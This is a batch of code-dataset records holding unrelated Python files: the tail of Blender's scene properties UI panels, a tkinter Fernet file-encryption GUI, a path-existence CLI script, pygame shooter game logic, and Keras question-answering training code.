= context.scene\n rd = context.scene.render\n ffmpeg = rd.ffmpeg\n\n flow = layout.grid_flow(row_major=True, columns=0, even_columns=True, even_rows=False, align=True)\n\n col = flow.column()\n col.prop(scene, \"audio_volume\")\n\n col.separator()\n\n col.prop(scene, \"audio_distance_model\")\n col.prop(ffmpeg, \"audio_channels\")\n\n col.separator()\n\n col = flow.column()\n col.prop(ffmpeg, \"audio_mixrate\", text=\"Sample Rate\")\n\n col.separator()\n\n col = col.column(align=True)\n col.prop(scene, \"audio_doppler_speed\", text=\"Doppler Speed\")\n col.prop(scene, \"audio_doppler_factor\", text=\"Doppler Factor\")\n\n col.separator()\n\n layout.operator(\"sound.bake_animation\")\n\n\nclass SCENE_PT_physics(SceneButtonsPanel, Panel):\n bl_label = \"Gravity\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n def draw_header(self, context):\n self.layout.prop(context.scene, \"use_gravity\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n\n scene = context.scene\n\n layout.active = scene.use_gravity\n\n layout.prop(scene, \"gravity\")\n\n\nclass SCENE_PT_rigid_body_world(SceneButtonsPanel, Panel):\n bl_label = \"Rigid Body World\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n @classmethod\n def poll(cls, context):\n return (context.engine in cls.COMPAT_ENGINES)\n\n def draw_header(self, context):\n scene = context.scene\n rbw = scene.rigidbody_world\n if rbw is not None:\n self.layout.prop(rbw, \"enabled\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n\n scene = context.scene\n rbw 
= scene.rigidbody_world\n\n if rbw is None:\n layout.operator(\"rigidbody.world_add\")\n else:\n layout.operator(\"rigidbody.world_remove\")\n\n\nclass SCENE_PT_rigid_body_world_settings(SceneButtonsPanel, Panel):\n bl_label = \"Settings\"\n bl_parent_id = \"SCENE_PT_rigid_body_world\"\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE'}\n\n @classmethod\n def poll(cls, context):\n scene = context.scene\n return scene and scene.rigidbody_world and (context.engine in cls.COMPAT_ENGINES)\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n\n scene = context.scene\n rbw = scene.rigidbody_world\n\n if rbw:\n flow = layout.grid_flow(row_major=True, columns=0, even_columns=True, even_rows=False, align=True)\n\n col = flow.column()\n col.active = rbw.enabled\n\n col = col.column()\n col.prop(rbw, \"collection\")\n col.prop(rbw, \"constraints\")\n\n col = col.column()\n col.prop(rbw, \"time_scale\", text=\"Speed\")\n\n col = flow.column()\n col.active = rbw.enabled\n col.prop(rbw, \"use_split_impulse\")\n\n col = col.column()\n col.prop(rbw, \"steps_per_second\", text=\"Steps Per Second\")\n col.prop(rbw, \"solver_iterations\", text=\"Solver Iterations\")\n\n\nclass SCENE_PT_rigid_body_cache(SceneButtonsPanel, Panel):\n bl_label = \"Cache\"\n bl_parent_id = \"SCENE_PT_rigid_body_world\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n @classmethod\n def poll(cls, context):\n scene = context.scene\n return scene and scene.rigidbody_world and (context.engine in cls.COMPAT_ENGINES)\n\n def draw(self, context):\n scene = context.scene\n rbw = scene.rigidbody_world\n\n point_cache_ui(self, context, rbw.point_cache, rbw.point_cache.is_baked is False and rbw.enabled, 'RIGID_BODY')\n\n\nclass SCENE_PT_rigid_body_field_weights(SceneButtonsPanel, Panel):\n bl_label = \"Field Weights\"\n bl_parent_id = \"SCENE_PT_rigid_body_world\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n @classmethod\n def poll(cls, context):\n scene = context.scene\n return scene and scene.rigidbody_world and (context.engine in cls.COMPAT_ENGINES)\n\n def draw(self, context):\n scene = context.scene\n rbw = scene.rigidbody_world\n\n effector_weights_ui(self, context, rbw.effector_weights, 'RIGID_BODY')\n\n\nclass SCENE_PT_custom_props(SceneButtonsPanel, PropertyPanel, Panel):\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n _context_path = \"scene\"\n _property_type = bpy.types.Scene\n\n\nclasses = (\n SCENE_UL_keying_set_paths,\n SCENE_PT_scene,\n SCENE_PT_unit,\n SCENE_PT_physics,\n SCENE_PT_keying_sets,\n SCENE_PT_keying_set_paths,\n SCENE_PT_keyframing_settings,\n SCENE_PT_audio,\n SCENE_PT_rigid_body_world,\n SCENE_PT_rigid_body_world_settings,\n SCENE_PT_rigid_body_cache,\n SCENE_PT_rigid_body_field_weights,\n SCENE_PT_custom_props,\n)\n\nif __name__ == \"__main__\": # only for live edit.\n from bpy.utils import register_class\n for cls in classes:\n register_class(cls)\n", "sub_path": "engine/2.80/scripts/startup/bl_ui/properties_scene.py", "file_name": "properties_scene.py", "file_ext": "py", "file_size_in_byte": 15186, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "bpy.types.UIList", "line_number": 36, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 59, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 75, 
"usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 159, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 193, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 230, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 293, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 332, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 351, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 379, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 418, "usage_type": "name"}, {"api_name": "properties_physics_common.point_cache_ui", "line_number": 433, "usage_type": "call"}, {"api_name": "bpy.types.Panel", "line_number": 436, "usage_type": "name"}, {"api_name": "properties_physics_common.effector_weights_ui", "line_number": 451, "usage_type": "call"}, {"api_name": "rna_prop_ui.PropertyPanel", "line_number": 454, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 454, "usage_type": "name"}, {"api_name": "bpy.types", "line_number": 457, "usage_type": "attribute"}, {"api_name": "bpy.utils.register_class", "line_number": 479, "usage_type": "call"}]}
+{"seq_id": "32795658", "text": "from cryptography.fernet import Fernet as fernet\nfrom tkinter import *\nfrom tkinter import filedialog, messagebox  # messagebox is a submodule and is not provided by the star import\nfrom encryption import *\ndef decryptFromUserInput():\n    userInputToken = entry2.get()\n    userInputFile = entry1.get()\n    try:\n        decdet = getDecryptionDetails(userInputFile)\n        decrypted = decryptFile(userInputToken, decdet['encryptedContents'])\n        messagebox.showinfo('Success!', decrypted)\n        text1.insert(END, decrypted)\n    except Exception:\n        messagebox.showinfo('Error', 'Unable to decrypt file')\ndef decryptFromUserInputToFile():\n    userInputToken = entry2.get()\n    userInputFile = entry1.get()\n    try:\n        decdet = getDecryptionDetails(userInputFile)\n        decrypted = decryptFile(userInputToken, decdet['encryptedContents'])\n        with open(userInputFile, 'w') as f:\n            f.write(decrypted)\n        messagebox.showinfo('Success!', 'File Decrypted')\n        text1.delete(1.0, END)\n        text1.insert(END, decrypted)\n    except Exception:\n        messagebox.showinfo('Error!', 'Unable to decrypt file')\ndef encryptFileFromUserInput():\n    userInputFile = entry1.get()\n    userInputKey = entry2.get()\n    if userInputKey != '':\n        try:\n            message = encryptFileWithKey(userInputFile, userInputKey)\n            print(message)\n            print('Encrypted file:' + userInputFile)\n            print('With key:' + userInputKey)\n        except Exception:\n            messagebox.showinfo('Error', 'Error encrypting with key provided')\n    else:\n        try:\n            key = encryptFileAndReturnKey(userInputFile)\n            messagebox.showinfo('Success', 'File encrypted')\n            messagebox.showinfo('token', 'Token:' + key)\n            text1.insert(END, key)\n        except Exception:\n            messagebox.showinfo('Error', 'Unable to encrypt file')\ndef chooseFile():\n    top.filename = filedialog.askopenfilename(initialdir='/', title=\"Select file\")\n    entry1.insert(END, top.filename)\n\ndef generateKey():\n    key = fernet.generate_key()\n    key = key.decode()\n    text1.delete(1.0, END)\n    #text1.insert(END,'Key:'+key)\n    text1.insert(END, key)\n    return 0\n\ntop = Tk()\nlabel1 = Label(top, text='File to decrypt/encrypt')\nlabel2 = Label(top, text='Encryption token')\nentry1 = Entry(top)\nentry2 = Entry(top)\nbutton1 = Button(top, text='Decrypt', command=decryptFromUserInputToFile)\nbutton2 = Button(top, text='Encrypt', command=encryptFileFromUserInput)\nbutton3 = Button(top, text='Generate token', command=generateKey)\ntext1 = Text(top, height=9, width=40)\nfile = Button(top, text='Choose file', command=chooseFile)\n\nlabel1.grid(row=0)\nlabel2.grid(row=1)\nentry1.grid(row=0, column=1)\nentry2.grid(row=1, column=1)\nbutton1.grid(row=2, column=0)\nbutton2.grid(row=2, column=1)\nfile.grid(row=2, column=2)\nbutton3.grid(row=2, column=3)\ntext1.grid(row=3, column=0, columnspan=5)\n\ntop.mainloop()\n\n#IMPORTANT\n#encryptFile('testsubject.txt')\n#decryptionDetails = getDecryptionDetails('testsubject.txt')\n#decrypted = decryptFile(decryptionDetails['encryptionToken'],decryptionDetails['encryptedContents'])\n#print('File decrypted: '+ decrypted)\n\n#save\n#encryptedContentsAsHex = '67414141414142646c3777466636596e4967615f736c4f5043674943634f4a6373674a6332374f7630335948394a5a4b624654465966744e5755434b5364674558324a5056666f5236527763435f38334d453053305157525a47382d724279656a413d3d'\n#encryptionToken = '6CIKhvDqFMA2PL-7PwSTx5tBwBMLYC1FlXp4kJHJr-s='\n#decryptFile(encryptionToken,encryptedContentsAsHex)\n\n\n\ndef example():\n    key = fernet.generate_key()\n    f = fernet(key)\n    token = f.encrypt(str.encode('secret'))\n    print('token: ' + bytes(token).hex())\n    decrypted = f.decrypt(token)\n    print('Decrypted: ' + decrypted.decode('utf-8'))\n\n\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3629, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tkinter.filedialog.askopenfilename", "line_number": 48, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 48, "usage_type": "name"}, {"api_name": "cryptography.fernet.Fernet.generate_key", "line_number": 52, "usage_type": "call"}, {"api_name": "cryptography.fernet.Fernet", "line_number": 52, "usage_type": "name"}, {"api_name": "cryptography.fernet.Fernet.generate_key", "line_number": 96, "usage_type": "call"}, {"api_name": "cryptography.fernet.Fernet", "line_number": 96, "usage_type": "name"}, {"api_name": "cryptography.fernet.Fernet", "line_number": 97, "usage_type": "call"}]}
+{"seq_id": "583451054", "text": "#!/usr/bin/python\n# coding: utf-8\n\nimport argparse\nimport os\nimport sys\nsys.path.insert(0, os.path.abspath('../..'))\n\nfrom ps_path import lib\n\n\ndef main():\n    parser = argparse.ArgumentParser(\n        description='Prints a boolean indicating whether the given path exists.')\n    parser.add_argument(\n        'path',\n        help='the path whose existence should be checked')\n    parser.add_argument(\n        '--path-type',\n        choices=['leaf', 'container', 'any'],\n        default='any',\n        help=\"\"\"leaf: returns True if the path exists and is a file. |\n            container: returns True if the path exists and is a directory. |\n            any: returns True if the path exists, whether it is a file\n            or a directory.\"\"\")\n\n    args = parser.parse_args()\n\n    result = lib.test_path(args.path, args.path_type)\n    print(result)\n\nif __name__ == '__main__':\n    main()\n", "sub_path": "ps_path/bin/test_path.py", "file_name": "test_path.py", "file_ext": "py", "file_size_in_byte": 1056, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.path.insert", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "ps_path.lib.test_path", "line_number": 31, "usage_type": "call"}, {"api_name": "ps_path.lib", "line_number": 31, "usage_type": "name"}]}
+{"seq_id": "536163694", "text": "### Import Libraries\r\nimport sys, pygame\r\nfrom time import sleep\r\n\r\n#### Import Modules\r\nfrom bullet import Bullet\r\nfrom alien import Alien\r\n\r\n### Functions -> Main game Functions\r\n\r\ndef check_events(ai_set, screen, stats, sb, play_button, ship, aliens, bullets):\r\n    '''Look for, and respond to, input events'''\r\n    for event in pygame.event.get():\r\n        #Exit conditions\r\n        if event.type == pygame.QUIT:\r\n            sys.exit()\r\n        elif event.type == pygame.MOUSEBUTTONDOWN:\r\n            mouse_x, mouse_y = pygame.mouse.get_pos()\r\n            check_play_button(ai_set, screen, stats, sb, play_button, ship, aliens, bullets, mouse_x, mouse_y)\r\n        #KEYDOWN and KEYUP events\r\n        elif event.type == pygame.KEYDOWN:\r\n            check_keydown_events(event, ai_set, screen, ship, bullets)\r\n        elif event.type == pygame.KEYUP:\r\n            check_keyup_events(event, ship)\r\n\r\ndef check_play_button (ai_set, screen, stats, sb, play_button, ship, aliens, bullets, mouse_x, mouse_y):\r\n    '''Starts a new game when the play button is clicked'''\r\n    button_clicked = play_button.rect.collidepoint(mouse_x, mouse_y)\r\n    if button_clicked and not stats.game_active:\r\n        #Reset game settings\r\n        ai_set.initialize_dynamic_settings()\r\n        #Reset the scoreboard\r\n        sb.prep_score()\r\n        sb.prep_level()\r\n        sb.prep_high_score()\r\n        sb.prep_ships()\r\n        #pygame.mouse.set_visible(False)\r\n        stats.reset_stats()\r\n        stats.game_active = True\r\n        #Reset aliens, bullets and fleet\r\n        aliens.empty()\r\n        bullets.empty()\r\n        create_fleet(ai_set, screen, ship, aliens)\r\n        ship.center_ship()\r\n\r\n\r\ndef check_keydown_events (event, ai_set, screen, ship, bullets):\r\n    '''Responds to KEYDOWN events'''\r\n    #Sets movement flags on arrow keys\r\n    if event.key == pygame.K_RIGHT:\r\n        ship.moving_right = True\r\n    elif event.key == pygame.K_LEFT:\r\n        ship.moving_left = True\r\n    #Creates a new bullet object on the space key\r\n    elif event.key == pygame.K_SPACE:\r\n        fire_bullet(ai_set, screen, ship, bullets)\r\n    #Exit on Q\r\n    elif event.key == pygame.K_q:\r\n        sys.exit()\r\n\r\ndef check_keyup_events (event, ship):\r\n    '''Responds to KEYUP events'''\r\n    if event.key == pygame.K_RIGHT:\r\n        ship.moving_right = False\r\n    elif event.key == pygame.K_LEFT:\r\n        ship.moving_left = False\r\n\r\ndef update_screen(ai_set, screen, stats, sb, ship, aliens, bullets, play_button):\r\n    '''Update and redraw the screen'''\r\n    #Screen redraw for each pass\r\n    screen.fill(ai_set.bg_color)\r\n    for bullet in bullets.sprites():\r\n        bullet.draw_bullet()\r\n    ship.blitme()\r\n    aliens.draw(screen)\r\n    sb.show_score()\r\n    #Draw the play button only when the game is inactive\r\n    if not stats.game_active:\r\n        play_button.draw_button()\r\n    #Make the most recent screen visible\r\n    pygame.display.flip()\r\n\r\ndef update_bullets (ai_set, screen, stats, sb, ship, aliens, bullets):\r\n    '''Update the positions of bullets and get rid of old bullets'''\r\n    #Bullet position update\r\n    bullets.update()\r\n    #Remove bullets that have left the screen\r\n    for bullet in bullets.copy():\r\n        if bullet.rect.bottom <= 0:\r\n            bullets.remove(bullet)\r\n    #Collision check\r\n    check_alien_bullet_collisions(ai_set, screen, stats, sb, ship, aliens, bullets)\r\n\r\ndef check_alien_bullet_collisions (ai_set, screen, stats, sb, ship, aliens, bullets):\r\n    '''Checks for and responds to collisions between bullets and aliens'''\r\n    #Collision check, removal of hit aliens and bullets, scoring, and game speed-up\r\n    collisions = pygame.sprite.groupcollide(bullets, aliens, True, True)\r\n    if collisions:\r\n        for hit_aliens in collisions.values():\r\n            stats.score += ai_set.alien_points * len(hit_aliens)\r\n            sb.prep_score()\r\n        check_high_score(stats, sb)\r\n    if len(aliens) == 0:\r\n        #Reset bullets and the alien fleet\r\n        bullets.empty()\r\n        ai_set.increase_speed()\r\n        create_fleet(ai_set, screen, ship, aliens)\r\n        #Increase level\r\n        stats.level += 1\r\n        sb.prep_level()\r\n\r\ndef fire_bullet (ai_set, screen, ship, bullets):\r\n    '''Fire a bullet if under the limit'''\r\n    if len(bullets) < ai_set.bullets_allowed:\r\n        new_bullet = Bullet(ai_set, screen, ship)\r\n        bullets.add(new_bullet)\r\n\r\ndef create_fleet (ai_set, screen, ship, aliens):\r\n    '''Creates a fleet of aliens'''\r\n    #Create an alien and find the number that fit in a row\r\n    alien = Alien(ai_set, screen)\r\n    number_aliens_x = get_number_aliens_x(ai_set, alien.rect.width)\r\n    number_rows = get_number_rows (ai_set, ship.rect.height, alien.rect.height)\r\n\r\n    #Create the rows of aliens\r\n    for row_number in range(number_rows):\r\n        for alien_number in range(number_aliens_x):\r\n            create_alien(ai_set, screen, aliens, alien_number, row_number)\r\n\r\ndef get_number_aliens_x (ai_set, alien_width):\r\n    '''Calculate the number of aliens per row'''\r\n    available_space_x = ai_set.screen_width - 2 * alien_width\r\n    number_aliens_x = int(available_space_x / (2 * alien_width))\r\n    return number_aliens_x\r\n\r\ndef create_alien (ai_set, screen, aliens, alien_number, row_number):\r\n    '''Create an alien and place it in the fleet'''\r\n    alien = Alien(ai_set, screen)\r\n    alien_width = alien.rect.width\r\n    alien.x = alien_width + 2 * alien_width * alien_number\r\n    alien.rect.x = alien.x\r\n    alien.rect.y = alien.rect.height + 2 * alien.rect.height * row_number\r\n    aliens.add(alien)\r\n\r\ndef get_number_rows (ai_set, ship_height, alien_height):\r\n    '''Calculate the number of rows of aliens that fit on the screen'''\r\n    available_space_y = (ai_set.screen_height - (3 * alien_height) - ship_height)\r\n    number_rows = int(available_space_y / (2 * alien_height))\r\n    return number_rows\r\n\r\ndef update_aliens (ai_set, screen, stats, sb, ship, aliens, bullets):\r\n    '''Update the positions of the aliens in the group'''\r\n    check_fleet_edge(ai_set, aliens)\r\n    aliens.update()\r\n    #Check for collisions between aliens and the ship\r\n    if pygame.sprite.spritecollideany(ship, aliens):\r\n        ship_hit(ai_set, stats, screen, sb, ship, aliens, bullets)\r\n    #Check for aliens hitting the bottom of the screen\r\n    check_aliens_bottom(ai_set, screen, stats, sb, ship, aliens, bullets)\r\n\r\ndef check_aliens_bottom (ai_set, screen, stats, sb, ship, aliens, bullets):\r\n    '''Check if any aliens have hit the bottom of the screen'''\r\n    screen_rect = screen.get_rect()\r\n    for alien in aliens.sprites():\r\n        if alien.rect.bottom >= screen_rect.bottom:\r\n            #same outcome as if the ship was hit\r\n            ship_hit(ai_set, stats, screen, sb, ship, aliens, bullets)\r\n            break\r\n\r\ndef ship_hit (ai_set, stats, screen, sb, ship, aliens, bullets):\r\n    '''Respond to the ship being hit by an alien.'''\r\n    if stats.ships_left > 0:\r\n        #deduct a ship and reset the bullets, aliens and ship position\r\n        stats.ships_left -= 1\r\n        sb.prep_ships()\r\n        aliens.empty()\r\n        bullets.empty()\r\n        create_fleet(ai_set, screen, ship, aliens)\r\n        ship.center_ship()\r\n        sleep(0.5)\r\n    else:\r\n        stats.game_active = False\r\n        #pygame.mouse.set_visible(True)\r\n\r\ndef check_fleet_edge (ai_set, aliens):\r\n    '''Checks and responds to an alien reaching the edge of the screen'''\r\n    for alien in aliens.sprites():\r\n        if alien.check_edge():\r\n            change_fleet_direction(ai_set, aliens)\r\n            break\r\ndef change_fleet_direction (ai_set, aliens):\r\n
'''Change direction and height'''\r\n for alien in aliens.sprites():\r\n alien.rect.y += ai_set.fleet_drop_speed\r\n ai_set.fleet_direction *= -1\r\n\r\ndef check_high_score (stats, sb):\r\n '''Checks for new high score.'''\r\n if stats.score > stats.high_score:\r\n stats.high_score = stats.score\r\n sb.prep_high_score()\r\n\r\n", "sub_path": "game_functions.py", "file_name": "game_functions.py", "file_ext": "py", "file_size_in_byte": 7791, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pygame.event.get", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.K_q", "line_number": 58, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 59, "usage_type": "call"}, {"api_name": "pygame.K_RIGHT", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 65, "usage_type": "attribute"}, {"api_name": "bullet.draw_bullet", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 81, "usage_type": "attribute"}, {"api_name": "bullet.rect", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pygame.sprite.groupcollide", "line_number": 97, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 97, "usage_type": "attribute"}, {"api_name": "bullet.Bullet", "line_number": 115, "usage_type": "call"}, {"api_name": "alien.Alien", "line_number": 121, "usage_type": "call"}, {"api_name": "alien.rect", "line_number": 122, "usage_type": "attribute"}, {"api_name": "alien.rect", "line_number": 123, "usage_type": "attribute"}, {"api_name": "alien.Alien", "line_number": 138, "usage_type": "call"}, {"api_name": "alien.rect", "line_number": 139, "usage_type": "attribute"}, {"api_name": "alien.x", "line_number": 140, "usage_type": "attribute"}, {"api_name": "alien.rect", "line_number": 141, "usage_type": "attribute"}, {"api_name": "alien.x", "line_number": 141, "usage_type": "attribute"}, {"api_name": "alien.rect", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollideany", "line_number": 156, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 156, "usage_type": "attribute"}, {"api_name": "alien.rect", "line_number": 165, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 180, "usage_type": "call"}, {"api_name": "alien.check_edge", "line_number": 188, "usage_type": "call"}, {"api_name": "alien.rect", "line_number": 194, "usage_type": "attribute"}]}
+{"seq_id": "490828457", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 18 09:30:32 2018\n\n@author: liyuan\n\"\"\"\nimport keras\nimport numpy as np\nfrom Struct import Struct\nfrom loss_functions import _loss_tensor\n\ndef adapt_embeddings(self,lr = 0.001, num_iter = 5,fits_per_iteration = 1,batch_size = 16, embeddings_verbose_flag = 1):\n training_model = self.training_model\n explain_intseq = self.data.exp_intseq\n questions_intseq = self.data.questions_intseq\n answers_intseq = self.data.answers_intseq\n [train_indices, val_indices, test_indices] = self.data.indices\n\n dummy_labels_train = self.data.dummy_labels_train\n dummy_labels_val = self.data.dummy_labels_val\n answers_intseq2_val = self.data.answers_intseq2_val \n \n training_model.get_layer('glove_embedding').trainable = True\n training_model.compile(optimizer = keras.optimizers.Adam(lr),loss = _loss_tensor,metrics = [])\n \n history_cache = dict()\n \n for i in range(num_iter):\n answers_intseq2 = self.data.sample_wrong_answers()\n X_train = [explain_intseq[train_indices],\n questions_intseq[train_indices],\n answers_intseq[train_indices],\n answers_intseq2[train_indices]]\n X_val = [explain_intseq[val_indices],\n questions_intseq[val_indices],\n answers_intseq[val_indices],\n answers_intseq2_val[val_indices]]\n history = training_model.fit(x = X_train,\n y = dummy_labels_train,\n validation_data = [X_val,dummy_labels_val],\n batch_size = batch_size,\n epochs = fits_per_iteration,\n verbose = embeddings_verbose_flag)\n history_cache[i] = history.history\n self.val_loss = np.append(self.val_loss,history.history['val_loss'])\n self.training_loss = np.append(self.training_loss,history.history['loss'])\n \n training_model.get_layer('glove_embedding').trainable = False\n training_model.compile(optimizer = keras.optimizers.Adam(lr),loss = _loss_tensor,metrics = [])\n \n self.training_model = training_model\n self.history_cache = history_cache\n \n\ndef run_many_times(self,num_runs = 5,num_iter = 20, learning_rate = 0.001, decay = 0, batch_size = 128, fits_per_iteration = 5,save_plot = 0, verbose = False, embeddings_verbose_flag = False, adapt_embeddings = False, adapt_iteration = 5):\n training_model = self.training_model\n explain_intseq = self.data.exp_intseq\n questions_intseq = self.data.questions_intseq\n answers_intseq = self.data.answers_intseq\n [train_indices, val_indices, test_indices] = self.data.indices\n\n dummy_labels_train = self.data.dummy_labels_train\n dummy_labels_val = self.data.dummy_labels_val\n answers_intseq2_val = self.data.answers_intseq2_val\n \n OPTIMIZER = keras.optimizers.Adam(lr = learning_rate,decay = decay)\n\n for i in range(num_runs):\n print('running run no. 
{} of {} runs...'.format(i+1,num_runs)) \n self.reset_weights()\n self.reset_losses()\n \n if adapt_embeddings is True:\n self.adapt_embeddings(num_iter = adapt_iteration,\n embeddings_verbose_flag = embeddings_verbose_flag)\n \n self.train(num_iter = num_iter,\n learning_rate = learning_rate,\n decay = decay,\n batch_size = batch_size,\n fits_per_iteration = fits_per_iteration,\n verbose = verbose,\n save_plot = save_plot)\n min_loss = np.min(self.val_loss)\n self.predict()\n \n save_all_models = 1\n if min_loss < 0.9 or save_all_models == 1:\n self.save_model()\n save_plot = 0\n self.plot_losses(save_plot = 0)\n \n self.plot_losses_many_runs(save_plot = 0)\n \n \n \ndef predict(self, subset = 1, verbose = 1):\n def softmax(predicted_output):\n a = np.exp(predicted_output)\n b = np.sum(a,1).reshape(-1,1)\n return a/b\n prediction_model = self.prediction_model\n all_answer_options_intseq = self.data.cache.all_answer_options_intseq\n explain_intseq = self.data.exp_intseq\n questions_intseq = self.data.questions_intseq\n answers = self.data.cache.answers\n indices = self.data.indices\n int_ans = np.array([self.data.convert_to_int(letter) for letter,ans in answers])\n \n \n if subset == 1:\n train_indices,val_indices,test_indices = self.data.indices \n train_indices = train_indices[0:150]\n val_indices = val_indices[0:150]\n test_indices = test_indices[0:150]\n indices = [train_indices,val_indices,test_indices]\n \n prediction_model.compile(optimizer = 'adam', loss = _loss_tensor, metrics = [keras.metrics.categorical_accuracy])\n all_answer_options_intseq = np.array(all_answer_options_intseq)\n acc = []\n \n for i in range(3):\n ind = indices[i]\n input1 = explain_intseq[ind]\n input2 = questions_intseq[ind]\n input3 = all_answer_options_intseq[:,0,:][ind]\n input4 = all_answer_options_intseq[:,1,:][ind]\n input5 = all_answer_options_intseq[:,2,:][ind]\n input6 = all_answer_options_intseq[:,3,:][ind]\n predicted_output = prediction_model.predict([input1,input2,input3,input4,input5,input6],\n batch_size = 64,\n verbose = verbose)\n predicted_output_softmax = softmax(predicted_output)\n predicted_ans = np.argmax(predicted_output,axis = 1)\n accuracy = np.mean(predicted_ans == int_ans[ind])\n acc.append(accuracy)\n\n print('train,val,test accuracies: {:.2f}/{:.2f}/{:.2f}'.format(acc[0],acc[1],acc[2]))\n \n \n cache = Struct()\n cache.predicted_output = predicted_output\n cache.predicted_output_softmax = predicted_output_softmax\n cache.predicted_ans = predicted_ans\n cache.int_ans = int_ans\n self.predictions_cache = cache\n self.acc = acc \n return cache ", "sub_path": "_deepqa_main.py", "file_name": "_deepqa_main.py", "file_ext": "py", "file_size_in_byte": 6213, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "keras.optimizers.Adam", "line_number": 25, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 25, "usage_type": "attribute"}, {"api_name": "loss_functions._loss_tensor", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.append", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 50, "usage_type": "attribute"}, {"api_name": "loss_functions._loss_tensor", "line_number": 50, "usage_type": "name"}, {"api_name": "keras.optimizers.Adam", "line_number": 67, "usage_type": "call"}, {"api_name": 
"keras.optimizers", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.min", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 109, "usage_type": "call"}, {"api_name": "loss_functions._loss_tensor", "line_number": 119, "usage_type": "name"}, {"api_name": "keras.metrics", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 136, "usage_type": "call"}, {"api_name": "Struct.Struct", "line_number": 142, "usage_type": "call"}]}
